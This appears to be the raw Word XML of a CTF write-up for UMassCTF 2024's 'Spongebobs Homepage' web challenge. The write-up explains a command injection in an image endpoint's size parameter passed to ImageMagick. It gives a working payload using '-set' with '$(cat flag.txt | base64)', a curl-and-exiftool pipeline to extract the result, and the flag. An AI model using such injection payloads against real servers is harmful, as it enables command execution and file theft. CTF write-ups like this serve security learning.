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FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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27"/>
        <w:gridCol w:w="7417"/>
      </w:tblGrid>
      <w:tr w:rsid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Default="005F7FC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5F7FCA" w:rsidRDefault="005F7FC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F7FCA" w:rsidRDefault="005F7FCA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5F7FCA" w:rsidTr="005F7FC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Pr="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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5F7FC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Default="005F7FCA" w:rsidP="005F7FC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UMassCTF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F7FCA" w:rsidTr="005F7FC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Pr="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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5F7FC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Default="005F7FCA" w:rsidP="005F7FCA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5F7FCA">
              <w:t>Spongebobs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F7FCA">
              <w:t xml:space="preserve"> Homepage</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F7FCA" w:rsidTr="005F7FC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Default="005F7FCA" w:rsidP="005F7FC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Default="005F7FCA" w:rsidP="005F7FCA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5F7FCA" w:rsidRPr="005F7FCA" w:rsidTr="005F7FC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Default="005F7FCA" w:rsidP="005F7FC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Default="005F7F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https://ctftime.org/event/2287/tasks/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsid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F7FCA" w:rsidRDefault="005F7FC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5F7FCA" w:rsidRP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F7FCA" w:rsidRDefault="005F7FCA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  <w:r w:rsidRPr="005F7FCA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Welcome to this great website about myself! Hope you enjoy ;) DIRBUSTER or any similar tools are NOT allowed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsid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F7FCA" w:rsidRDefault="005F7FCA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F7FCA" w:rsidRDefault="005F7FCA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5F7FCA" w:rsidRP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F7FCA" w:rsidRDefault="005F7FCA">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t>There is a </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="DD1144"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E1E1E8" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7F7F9"/>
              </w:rPr>
              <w:t>#command-injection</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t> in the </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="DD1144"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E1E1E8" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7F7F9"/>
              </w:rPr>
              <w:t>/assets/image</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t> path in </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="DD1144"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E1E1E8" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7F7F9"/>
              </w:rPr>
              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t> query parameter. The size is passed on to the </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t>convert-im6.q16</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t> command. When I tried various command injection payloads, it resulted in an error.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F7FCA" w:rsidRDefault="005F7FCA">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC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836920" cy="3992880"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="1" name="Рисунок 1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rr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920" cy="399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7FCA" w:rsidRPr="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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5F7FCA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During my tries, I wasn't able to escape from the current command, so I just looked for available arguments. I learned can use </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA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-set</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA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 argument in convert-im6.q16 to set meta tags to the image. This resulted to the following payload: </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA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200 -set Flag "$(cat flag.txt | base64)"</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA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. Encoding in base64 is not really required for this challenge.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F7FCA" w:rsidRPr="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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5F7FCA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lastRenderedPageBreak/>
              <w:t>http://spongebob-blog.ctf.umasscybersec.org/assets/image?name=spongebob&amp;size=200%20-set%20Flag%20%22$(cat%20flag.txt%20|%20base64)%22</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F7FCA" w:rsidRPr="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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5F7FCA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We can download the image rendered and view using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005F7FCA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exiftool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F7FCA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and decode from base64</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F7FCA" w:rsidRDefault="005F7FCA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75960" cy="1531620"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="Рисунок 2" descr="metad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tada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7FCA" w:rsidRPr="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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curl -s </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA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'http://spongebob-blog.ctf.umasscybersec.org/assets/image?name=spongebob&amp;size=200%20-set%20Flag%20%22$(cat%20flag.txt%20|%20base64)%22'</w:t>
            </w:r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| </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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exiftool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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grep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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Flag | cut -d </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA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':'</w:t>
            </w:r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-f 2 | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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-d </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA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'!'</w:t>
            </w:r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 xml:space="preserve">| </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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xargs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F7FCA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 xml:space="preserve"> | base64 -d </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F7FCA" w:rsidRPr="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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5F7FCA"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  <w:t>flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F7FCA"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  <w:t>: </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FCA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>UMASS{B4S1C_CMD_INJ3CTI0N}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsid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Default="005F7FC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FCA" w:rsidRDefault="005F7FC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FCA" w:rsidRDefault="005F7FC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5F7FCA" w:rsidTr="005F7FC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FCA" w:rsidRDefault="005F7FC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  <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7FCA" w:rsidRDefault="005F7FCA" w:rsidP="005F7FCA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FCA"/>
    <w:rsid w:val="005F7FC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28F91"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EC6D343B-816F-48DC-9A03-5A022122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5F7FCA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5F7FCA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F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F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7FCA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5F7FC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5F7FCA"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a3">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="005F7FCA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5F7FC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4">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005F7FCA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005F7FC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5F7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7FC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">
    <w:name w:val="hljs-_"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005F7FCA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005F7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4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221</Words>
  <Characters>1260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2024-06-29T19:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-29T19:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>